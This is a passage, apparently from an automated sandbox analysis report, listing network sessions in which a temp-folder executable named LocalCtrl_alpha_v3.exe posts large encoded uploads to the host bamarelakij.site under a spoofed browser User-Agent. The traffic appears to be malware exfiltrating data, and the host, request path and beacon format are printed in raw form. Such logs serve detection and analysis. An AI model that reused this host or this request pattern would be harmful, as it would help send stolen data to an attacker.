                                                                                                                                                                                                                                                                          2025-01-09 13:56:08 UTC14825OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 ae 39 00 00 eb bf 07 33 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 08 00 00 00 d7 7f 0e 66 00 00 00 00 27 81 00 21 00 00 00 00 f4 72 00 00 d7 7f 0e 66 00 00 00 00 a0 96 06 08 5a 00 00 10 10 00 3e 56 92 b2 b3 3a 56 71 ff ff ff ff ff ff ff ff 34 00 28 00 8e e4 c2 c4 c4 ca e4 b8 c8 ca e6 b8 84 9c 82 8e 9a 8e a6 a0 98 9e 5c e0 c8 cc 02 00 20 00 04 08 00 00 00 00 00 00 0e 08 00 00 00 00 00 00 02 04 08 fb f7 84 9c 82 8e 9a 8e a6 a0 98 9e a2 9c 96 98 ac a2 ae b2 b2 ae b2 8e 88 a8 9c 92 90 90 a0 a6 8e 96 b2 84 9c 84 9c 8e 8c a6 b4 8e b2 b2 8c aa ac 9c a6 9e b2 a8 82 9a b4 a0 9e 92 9e 96 9a 8c 8c ae 88 94 92 b2 86 94 8e a8 ae b4 a6 9a b0 82 88 84 a6 94 88 8a 96 88 a8 a0 b0 88 ac b2 84 92 b4
                                                                                                                                                                                                                                                                          Data Ascii: 93G6f'!rfZ>V:Vq4(\
                                                                                                                                                                                                                                                                          2025-01-09 13:56:08 UTC766INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:08 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          pid: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vqrjZlV4RTj1aqBMHYcawi%2BaZ1RP38h%2BMJ45Yr4DitGXIM%2FOnqgKFmogelLNyXXpEDYPOwMS03gXirvPvwAegbGdg7DMKtRqNi7liPAxKXSKH3zAST6m2uc8b3xX8vQ%2Bjm1%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4edd04a7f4259-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1649&min_rtt=1647&rtt_var=622&sent=8&recv=20&lost=0&retrans=0&sent_bytes=2839&recv_bytes=15871&delivery_rate=1752701&cwnd=235&unsent_bytes=0&cid=94d2b6f1d2864623&ts=329&x=0"


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          25192.168.2.850068104.21.80.524436712C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:56:09 UTC388OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          p: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          Content-Length: 69022
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
                                                                                                                                                                                                                                                                          2025-01-09 13:56:09 UTC15331OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 63 0d 01 00 54 2f 9d 2d 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 10 1a 00 00 a8 5e 3b 5a 00 00 00 00 37 81 4d 68 68 6a 70 62 6e 4d d0 ea c4 ca e4 e8 27 14 00 9b 94 ca 23 25 9b 0a 00 9b 08 00 9f 00 00 00 02 ff e9 00 00 b3 4c 92 dc e8 ca d8 50 a4 52 40 86 de e4 ca 50 a8 9a 52 64 40 86 a0 aa 40 6c 6c 60 60 40 80 40 64 5c 68 60 40 8e 90 f4 23 7f 9a d2 c6 e4 de e6 de cc e8 40 84 c2 e6 d2 c6 40 88 d2 e6 e0 d8 c2 f2 40 82 c8 c2 e0 e8 ca e4 81 87 b9 00 7d 41 4d a6 f2 e6 e8 ca da 51 a4 ca ce d2 e6 e8 e4 f2 51 e6 da e6 e6 5c ca f0 ca 53 c6 e6 e4 e6 e6 5c ca f0 ca 57 ee d2 dc d2 dc d2 e8 5c ca f0 ca 53 c6 e6 e4 e6 e6 5c ca f0 ca 59 ee d2 dc d8 de ce de dc 5c ca f0 ca 59 e6 ca e4 ec d2 c6 ca
                                                                                                                                                                                                                                                                          Data Ascii: cT/-G6^;Z7MhhjpbnM'#%LPR@PRd@@ll``@@d\h`@#@@@}AMQQ\S\W\S\Y\Y
                                                                                                                                                                                                                                                                          2025-01-09 13:56:09 UTC15331OUTData Raw: 1a 17 fe c3 87 5e 62 a7 fe 99 96 45 f4 9f 5f 47 2a 90 96 f9 c7 81 cc 09 f9 bc 0e ff 72 96 7f 4d fd 7f 5d 3f be 89 df aa c4 c2 f3 1d 2d 43 8e 10 14 b4 8d a9 fa cb 67 d4 d3 6e b2 c4 dc 37 60 d3 2c 40 19 b6 bd 3e 22 ff 6d bb 52 12 c6 17 36 12 39 e1 fc e6 1b bf ae c9 3c d6 38 17 28 f8 5d c2 b6 5a 4a e5 4a 2a de 42 d2 d6 65 e1 86 22 ca 79 9c f8 da 93 95 27 2e 3f be ae 58 75 75 5d af e7 a5 5b 5f 79 b7 7e ce 97 b7 bd 31 db 6d 50 c9 e3 b5 22 f1 75 93 2c 2d 8a 16 2f 47 7f e3 c1 98 8f 4a 7f fa 7e a4 cf f7 bd 4f e5 d0 ff 08 fc 32 2f 03 25 5c bb c7 c0 68 d7 e2 e7 17 0b 79 ef 3d 14 fa a7 09 38 9f 75 1f a8 e9 ec 31 bd c8 c3 ef dd df b7 72 cc 5f ee 78 a4 8b 2c 8b 0c 27 af 6f d1 82 ad ff 79 ae f9 7d 6a 88 f9 4f ba 9d 1f 0f be 89 ff 1e 88 fd 37 85 21 a4 29 81 c0 f1 5b 28
                                                                                                                                                                                                                                                                          Data Ascii: ^bE_G*rM]?-Cgn7`,@>"mR69<8(]ZJJ*Be"y'.?Xuu][_y~1mP"u,-/GJ~O2/%\hy=8u1r_x,'oy}jO7!)[(
                                                                                                                                                                                                                                                                          2025-01-09 13:56:09 UTC15331OUTData Raw: 07 af 3a 0c 6c f7 9d 34 a0 39 b3 aa 60 34 0b 2a 28 58 b6 2a c6 9a fc 24 6b df 1c 4a b5 09 14 53 b2 27 da 84 0b e5 92 07 ed 27 7d 77 48 c5 40 7d 8b 46 03 70 35 ce 54 a1 5d c9 37 79 99 e2 33 51 d4 2c e3 f2 4e 7b 0f 74 90 c0 e9 f8 cb ab e8 7f be 26 40 79 bc 11 08 94 9c f4 1e ea 5c 21 01 21 b0 1e 97 07 0c 60 21 e1 58 71 0e c3 31 78 54 5c ea a5 be 7a f0 21 ec 07 66 1e c1 b2 5e e8 4e 2e d7 48 72 65 68 d8 30 15 0c 47 21 19 48 46 6c 31 8c cc 22 36 15 e0 cc a8 5c e8 a7 c6 d2 cd ee b0 b7 60 9e a1 2f 0f 7e 87 31 c6 e8 25 4b 4c 55 be f5 68 a7 c6 0c 53 45 ed fd 16 6a fb ce 15 b8 45 02 5a 7c 34 c0 1f 6d b3 14 b3 49 3c af 9c 32 0d 3f 36 6e e4 b4 bb fa 1d 3c f9 6b 76 9b fc 2c d5 1e a2 34 13 ba 90 cc 12 91 fa 15 bb 19 76 da 9e d1 7d ec 1d 73 ea 23 74 0d 0d 3c 54 7e df b1
                                                                                                                                                                                                                                                                          Data Ascii: :l49`4*(X*$kJS''}wH@}Fp5T]7y3Q,N{t&@y\!!`!Xq1xT\z!f^N.Hreh0G!HFl1"6\`/~1%KLUhSEjEZ|4mI<2?6n<kv,4v}s#t<T~
                                                                                                                                                                                                                                                                          2025-01-09 13:56:09 UTC15331OUTData Raw: 6a 2e 0a fb 63 df c8 f2 1d 14 f5 35 21 61 d0 33 fe 6b 6c c6 84 34 13 73 45 c0 5d f5 b8 d6 b6 36 a2 0a 5b be 6f 09 c8 27 e7 7d b5 a1 99 79 fa bb ed 36 5f 5b 4c 0a b7 7a 48 01 e6 3b 9c 98 cb 68 f0 f9 08 74 f2 a4 c7 c3 5d d2 74 fb 7d 94 bd e2 5b 27 a0 ff 18 66 12 e5 09 74 1c b8 c0 93 30 68 16 bc ac 71 8a 94 76 ff 15 45 ac 60 7f 16 4c bc a0 4b 64 40 bc a0 ce b9 66 16 3b 62 45 af e6 94 54 34 99 f0 47 a6 a4 3a ec dc 93 fc 47 a1 5a 2b 68 b9 e3 4a fc 55 ba 62 a2 00 03 ca a6 83 d6 4e 14 d1 0c b7 c5 61 2d 43 5b 54 a2 95 88 92 b1 13 c5 1a e6 45 6f 5c 3d fb c3 12 3e 8a 1c e5 56 c2 81 bd 63 30 33 d9 5b d0 f4 57 d9 1e 4a d0 bc 79 99 6c ad 36 b4 04 13 3e 70 4d 45 50 86 17 06 cd 9b c6 1e e5 17 48 16 0e e4 26 86 58 8e 46 e9 bc ee fa 93 23 6d c8 3e 29 22 65 3c de 88 60 2d
                                                                                                                                                                                                                                                                          Data Ascii: j.c5!a3kl4sE]6[o'}y6_[LzH;ht]t}['ft0hqvE`LKd@f;bET4G:GZ+hJUbNa-C[TEo\=>Vc03[WJyl6>pMEPH&XF#m>)"e<`-
                                                                                                                                                                                                                                                                          2025-01-09 13:56:09 UTC7698OUTData Raw: 8f 48 65 5d 25 b9 79 15 8b 45 2f af c4 cd b3 da e6 a6 ab c5 df 56 bd b4 68 6c 23 08 20 35 ba 8f 96 66 03 5a 5f 17 aa 6c 08 3b c9 e5 47 76 ea 94 df 94 57 10 5c 12 15 8a 5d 4e d8 8e d7 46 03 dc 38 51 85 04 04 d8 29 ec a9 a1 30 fe df fc 93 01 72 ad e5 c0 00 86 19 d4 2d 25 13 0d 35 6a f7 e6 9b da 4f 28 9c 27 9b 7d 74 1b 5f 33 93 61 47 dc 22 6d a5 db 05 6e ee e8 d1 54 d4 bd 54 03 7f 21 9d a3 bb 2d b8 d2 63 6f f4 ae e1 c4 76 46 d5 69 e7 bb fb 29 0a b6 4c a2 fd ea 62 c6 09 d0 d2 f3 1d 65 25 18 23 e6 2b a1 6d 80 76 d3 87 0f 9f bd 0c 1c 8d ab 71 f6 3d f2 a3 4b d8 cf ce 63 7d 1b d4 2c 12 da c8 7f d6 13 08 1d 7d 14 bc 61 0b db 88 6e 59 5b f2 21 2b 61 f2 a1 a1 96 49 5a 90 7e 47 9b b8 fa 82 d0 73 04 35 71 51 0c 30 9d 19 c6 f5 c7 9d ed 9c 2d f0 ae 91 f7 36 2c 8d 7e cd
                                                                                                                                                                                                                                                                          Data Ascii: He]%yE/Vhl# 5fZ_l;GvW\]NF8Q)0r-%5jO('}t_3aG"mnTT!-covFi)Lbe%#+mvq=Kc},}anY[!+aIZ~Gs5qQ0-6,~
                                                                                                                                                                                                                                                                          2025-01-09 13:56:10 UTC778INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:10 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          pid: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WavCL%2B0kisqWyKzrX%2FBSd2AKX4iCwKn2%2Bm%2Bt9ewaLIVq2txyZGACvgQ%2FqY9YQ%2BtxRxTO6exBo%2F5UrCIgGoEHFW73u0qFf1mB%2BWmBFHFcziPzFSNEEJAZoLspZ3%2BtW3tP2%2FI5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4edd9ae36425b-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2687&min_rtt=1608&rtt_var=1374&sent=27&recv=75&lost=0&retrans=0&sent_bytes=2838&recv_bytes=70222&delivery_rate=1815920&cwnd=241&unsent_bytes=0&cid=712d06ddd89095bf&ts=605&x=0"


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          26192.168.2.850075104.21.80.524436712C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:56:11 UTC385OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          p: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          Content-Length: 35
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
                                                                                                                                                                                                                                                                          2025-01-09 13:56:11 UTC35OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          2025-01-09 13:56:11 UTC722INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:11 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4M9ZTeNtBAkZhOGuUy0vzYxX41sxt5Sm677CM3Cmt9G1SO7YRPTfjJ45eOrMGFQxKO7gu7MRys7p7sfpUqmnF9SScNe9eVJQHR%2FbDU7JvfWWLs0ew9rnQIKiY3MfT9EbI7rV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4ede17c691902-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1646&min_rtt=1637&rtt_var=633&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1056&delivery_rate=1702623&cwnd=219&unsent_bytes=0&cid=b44dedf1afc0c020&ts=337&x=0"


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          27192.168.2.850094104.21.80.524432856C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:56:24 UTC389OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          p: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          Content-Length: 684636
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
                                                                                                                                                                                                                                                                          2025-01-09 13:56:24 UTC15331OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 a0 1c 0a 00 58 04 ce 1c 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 16 06 00 00 b0 08 9d 38 00 00 00 00 27 81 21 25 31 81 21 4d 86 d0 e4 de da ca b3 6a 86 74 b8 aa e6 ca e4 e6 b8 d0 ea c4 ca e4 e8 b8 82 e0 e0 88 c2 e8 c2 b8 98 de c6 c2 d8 b8 8e de de ce d8 ca b8 86 d0 e4 de da ca b8 aa e6 ca e4 40 88 c2 e8 c2 23 33 81 21 4f 88 ca cc c2 ea d8 e8 b3 7a 86 74 b8 aa e6 ca e4 e6 b8 d0 ea c4 ca e4 e8 b8 82 e0 e0 88 c2 e8 c2 b8 98 de c6 c2 d8 b8 8e de de ce d8 ca b8 86 d0 e4 de da ca b8 aa e6 ca e4 40 88 c2 e8 c2 b8 88 ca cc c2 ea d8 e8 b3 68 c6 d0 e4 de da d2 ea da be c4 e4 de ee e6 ca e4 e6 b8 86 d0 e4 de da ca b8 e0 e4 de cc d2 d8 ca e6 b8 88 ca cc c2 ea d8 e8 b8 98 de ce d2 dc 40 88 c2
                                                                                                                                                                                                                                                                          Data Ascii: XG68'!%1!Mjt@#3!Ozt@h@
                                                                                                                                                                                                                                                                          2025-01-09 13:56:24 UTC15331OUTData Raw: a0 b4 84 a6 e4 ce 82 b0 f4 60 8c 96 d6 e0 ea dc 94 6a ea e0 6e aa e0 8a dc 9c da 9e 86 ea b2 9e f2 c6 e2 84 e4 94 96 56 da 8e ee b4 b4 a0 ee 9e 68 70 68 ca e6 8e ac 9a c2 56 88 60 66 82 60 66 94 a2 ec 9e f0 aa 92 da 84 c2 ac 90 e4 96 c4 c4 b2 84 64 aa d4 d0 8c 8e 84 cc c4 8e 60 94 90 82 66 d4 ce ce 96 e4 82 66 82 aa da 9e a2 ee de ea 68 8e c2 f4 84 72 f0 f4 ea e6 5e 70 6a 90 da 60 92 5e c4 ca 90 e8 a6 e8 68 9a de a6 ec a2 ee cc 9e f4 94 6a 56 96 a6 96 cc a6 a4 72 e8 b2 da f4 88 68 c2 ac e8 62 64 96 d8 ac c2 ca 70 86 e8 e8 ac 9e 9a 92 8a ac a2 6c 90 e2 e4 e6 a4 f4 6a d0 5e c6 ac d4 f2 c4 8c b2 9e 8e 56 a6 a2 d8 64 84 c6 90 68 9c 64 9e a6 f2 90 8e da 62 68 ae d0 66 e0 dc 9a 82 96 c4 ee f2 e0 e0 6e f4 e0 60 d2 d8 ae 6e ce 72 ac 92 86 9a 66 68 62 62 d2 8e 98
                                                                                                                                                                                                                                                                          Data Ascii: `jnVhphV`f`fd`ffhr^pj`^hjVrhbdplj^Vdhdbhfn`nrfhbb
                                                                                                                                                                                                                                                                          2025-01-09 13:56:24 UTC15331OUTData Raw: 9e a0 68 b4 56 8a 72 d4 ea e6 da 82 cc 86 86 b0 f4 a2 f4 c6 72 de 94 a2 d2 68 6c b4 62 6c 66 a2 8c c4 90 8a a4 96 d0 de c6 d0 a4 de a2 8c 72 72 ea a2 72 a2 70 92 6c 90 96 68 a8 a4 6e 96 98 a8 88 f2 f2 a8 66 6a ca 66 ce f2 ea 9e 8e d0 d0 98 ec a8 da ec ae de de 6c f4 60 aa a0 84 9e 70 84 6c ec 70 66 72 8c 94 6e 68 8c e2 72 66 8a aa 9a 94 8a d2 d0 84 ce de 70 f2 86 90 94 84 ce de 70 f0 86 a0 94 84 ce e4 e6 b4 84 92 aa ce ee a8 60 9a ce da 96 a2 68 9e 9a 9a ce e6 8a ce ee a6 c6 b2 84 96 aa ce ee a6 c6 b4 84 8a 9c 84 ce d6 56 6a 84 88 ec 84 d0 de 6c d2 9a d6 8e 96 ca 62 d6 aa d8 86 6e ec b2 62 8c a2 f2 ec ee 60 d2 68 98 a6 6a ec 60 e6 86 d6 e2 c8 88 6e 82 de 96 90 62 56 d0 d6 ac 84 96 cc a6 ec ae a4 a6 aa a4 d4 5e 98 de e2 84 aa 56 d4 d6 ae 84 c2 b0 a8 f4 f4
                                                                                                                                                                                                                                                                          Data Ascii: hVrrhlblfrrrplhnfjfl`plpfrnhrfpp`hVjlbnb`hj`nbV^V
                                                                                                                                                                                                                                                                          2025-01-09 13:56:24 UTC15331OUTData Raw: e2 d8 72 92 62 aa 6e cc dc d6 86 5e e4 9a e0 98 b2 64 aa f0 c6 8c 70 d8 84 c4 aa 6c ea ae b4 a2 a6 b4 e2 82 e4 72 a6 e0 c6 56 8e 86 90 90 90 a6 e0 a0 a2 ca ae 6a e2 a0 62 8a 82 98 ae 66 dc d0 ea 5e aa 84 da de 72 68 e2 68 70 e6 96 e6 64 86 e4 c4 72 86 6a b0 92 9a 62 f2 70 aa e0 ce ec cc c6 68 e4 84 ca e2 92 68 b2 c2 e4 c2 60 b0 96 e8 da a4 92 d8 66 ce 6c ec 90 cc a4 6c dc de c4 d6 62 da ac ee ca dc b4 f2 c6 a4 b4 d6 5e 66 64 cc aa d2 68 96 d4 a2 a8 68 ea aa 88 da ea ca aa ce e4 72 d8 8c f0 90 9e 9e 6e e6 86 8e 68 c6 72 da e8 d2 f4 d6 d0 64 a8 c2 f2 a0 d0 c4 e6 da 6a e6 b2 a8 6e 56 9e f0 e8 5e 96 e6 62 c6 e0 f0 a6 84 c6 56 ec b4 b0 e6 b2 ea a4 82 9e 96 d6 64 e2 60 e0 98 e4 d6 a0 f0 cc 84 9a 6a c2 84 a8 a0 5e 8a e2 a8 8a b2 f4 b0 6c 6e d2 d2 ec 82 c2 8a d6
                                                                                                                                                                                                                                                                          Data Ascii: rbn^dplrVjbf^rhhpdrjbphh`fllb^fdhhrnhrdjnV^bVd`j^ln
                                                                                                                                                                                                                                                                          2025-01-09 13:56:24 UTC15331OUTData Raw: a0 c8 ea a4 de 72 e6 d0 88 f4 86 6e 62 b2 92 64 72 ce 66 64 84 ea 6e 56 d4 b2 ea e4 9a ce b2 8e b0 c4 ea b2 ac d0 f0 56 70 d0 9e 56 66 c2 8e 8c a6 6e a2 c6 8e e6 90 ce f2 6c ac 6e f2 9e 6e 8c de ee d8 5e a2 b0 c8 ae 98 aa b0 92 e2 dc e2 e4 e4 6a 62 5e 9c 92 d4 d0 8c 82 a0 9a b4 62 d8 6c ec d2 d2 98 9e 82 8c e2 90 f4 d2 a8 92 f4 72 a2 5e 62 b4 d0 9e ec 5e 68 cc e0 5e ea a0 68 cc e4 ec 56 90 6c 5e 5e d0 56 dc 56 68 5e d0 56 ea 5e 68 cc e4 5e 56 90 6c cc 6e d4 56 90 6c 6e 5e d0 56 ec 5e 68 cc e0 5e ea a0 68 cc e4 ec 56 90 6c 5e 5e d0 56 dc 56 68 5e d0 56 ea 5e 68 cc e4 5e 56 90 6c cc 6e d4 56 ec ee dc ae 5e ee e8 e6 5e c8 72 ee 92 a6 e8 70 f0 60 6e f2 8e 8c 68 ee 82 96 b0 a2 90 de 84 96 90 e0 ec a8 8c 96 d6 f0 d8 d0 de f4 94 de 6c 8c a6 8e d6 b0 64 c6 6c 70
                                                                                                                                                                                                                                                                          Data Ascii: rnbdrfdnVVpVfnlnn^jb^blr^b^h^hVl^^VVh^V^h^VlnVln^V^h^hVl^^VVh^V^h^VlnV^^rp`nhldlp
                                                                                                                                                                                                                                                                          2025-01-09 13:56:24 UTC15331OUTData Raw: 88 a4 9e f0 e8 6c ae aa d6 8e 92 cc 66 d2 60 b2 a0 f0 5e cc 82 a4 f0 9a 64 84 9a c6 d4 88 56 c8 8c 9a a8 d2 96 d6 6e dc 86 b4 b0 5e e6 d6 88 9a 70 de e8 8c de d6 f2 de da 86 8a e4 d2 a2 6c 6a f4 aa aa 9c da 5e c4 88 68 de a4 94 90 8e 64 f4 de a0 c2 d4 84 c8 d4 98 9a 66 c4 6c a2 92 a4 d8 8a d2 e6 72 96 9e 90 c2 8a a8 6c c4 c6 c6 d2 a0 68 a8 e0 c6 c4 8a a6 9e 66 66 92 a4 ee f2 d2 94 9e 90 94 f0 ce 8a e0 72 8a d2 de ac e2 82 c2 5e 92 8c b4 94 b2 ec b2 de 64 dc 64 e2 9c 8e a4 aa 5e dc 66 8a 9c a6 70 ae d4 b2 de 8c 8e ce 60 a8 88 68 d2 ea e0 64 8e 90 f0 86 dc 70 a0 dc ec ae 98 ea d6 cc d0 84 ea 5e 86 d8 66 9c c8 9e 84 9e 8e 8e 56 f4 84 d0 f0 6e 9e d0 60 82 96 ce e4 6e ce d4 b4 ae a8 e0 e8 62 70 c4 da 9a ac 8a c8 86 9c ac c6 d4 96 c4 c2 f0 d0 ec 98 96 a2 e8 66
                                                                                                                                                                                                                                                                          Data Ascii: lf`^dVn^plj^hdflrlhffr^dd^fp`hdp^fVn`nbpf
                                                                                                                                                                                                                                                                          2025-01-09 13:56:24 UTC15331OUTData Raw: c4 ae c6 d4 ce cc ac 72 82 62 62 a6 98 60 e6 6c ce ae 68 9a ce ac 90 e0 9c 70 9a ca c6 60 c4 62 ec da 98 8a ce d2 de 96 ce 8c a6 a2 a2 84 c4 60 8a a6 ce f2 a4 90 92 d2 64 6c ca d4 8e e8 8a c8 e6 82 84 90 c6 60 da 6c 86 c8 a6 64 68 c6 86 d8 a6 72 a4 96 d0 f2 a0 86 de 64 94 e2 d2 a6 d2 62 f2 d0 da e0 e6 de ac 9c 82 b4 a4 ea a6 88 d2 f0 ac ea a0 f4 88 d6 da c6 9c 6a 90 b0 f0 84 c4 ac 66 a4 c6 96 b4 e6 a4 aa 9a d4 86 56 70 90 c2 98 82 e8 72 f2 ce 6c 6c ec 94 b0 84 6e e8 70 66 d8 9e e8 a4 9e 8c 68 72 d8 c8 84 96 e2 c6 82 de cc de d8 86 e0 a4 b0 ec 60 a4 a4 d2 e8 aa ec c6 c8 d0 f2 9a da f0 5e a8 94 90 de ac dc de f0 a4 ae 96 d6 8a b2 ce e0 8a de 70 e4 94 70 86 e8 90 60 96 88 d0 9e e0 d6 a6 56 ce ea ce c2 6c cc ac ac c4 a8 9e 86 f2 72 c2 64 e8 de cc 98 60 9e d4
                                                                                                                                                                                                                                                                          Data Ascii: rbb`lhp`b`dl`ldhrdbjfVprllnpfhr`^pp`Vlrd`
                                                                                                                                                                                                                                                                          2025-01-09 13:56:24 UTC15331OUTData Raw: 94 d0 d0 a4 66 da c2 66 aa ae 68 8e 90 f4 70 f0 8a a6 9e ec 68 ec dc 84 9e d6 8e ae 84 6a aa ea e2 72 c4 94 6a a0 e4 e4 b4 9e c8 e2 d4 c6 64 a2 f0 88 da a8 d4 88 66 64 a2 c2 ee ec 6c ca 6a b2 6a d8 9c d4 9a 86 c8 ca 6a f2 6a 66 64 dc b0 98 f4 f2 98 d0 e6 da a4 d0 ec a2 c6 64 6a a0 c6 64 90 6a ea 72 98 de b2 56 66 ea a4 a4 8a aa a6 8c aa dc aa ea d2 b0 e2 96 9c e8 98 8a 9a 70 9c ec c8 98 e6 d2 72 b4 5e 64 ca cc e4 ca 90 f0 56 ea d0 72 c2 64 b2 6a 90 d6 c4 a0 6a b0 ce 88 cc 66 f0 5e f0 cc c6 a8 66 da 70 d4 66 e4 64 aa ca 6c 86 ac d2 e6 e0 d8 9a 68 c4 da b4 dc a2 cc 56 62 5e 9a ec f0 a8 b4 8c da b2 70 f2 9a f4 72 ce 6a dc f4 8a f4 84 8a f4 c4 f2 92 f4 5e 72 da 60 6a 5e 8c de d4 6a dc cc 70 e8 6c b0 b2 d0 8e dc a4 b4 f2 64 d2 b4 ee 64 e2 e8 c2 8a ce ac e4 c4
                                                                                                                                                                                                                                                                          Data Ascii: ffhphjrjdfdljjjjfddjdjrVfpr^dVrdjjf^fpfdlhVb^prj^r`j^jpldd
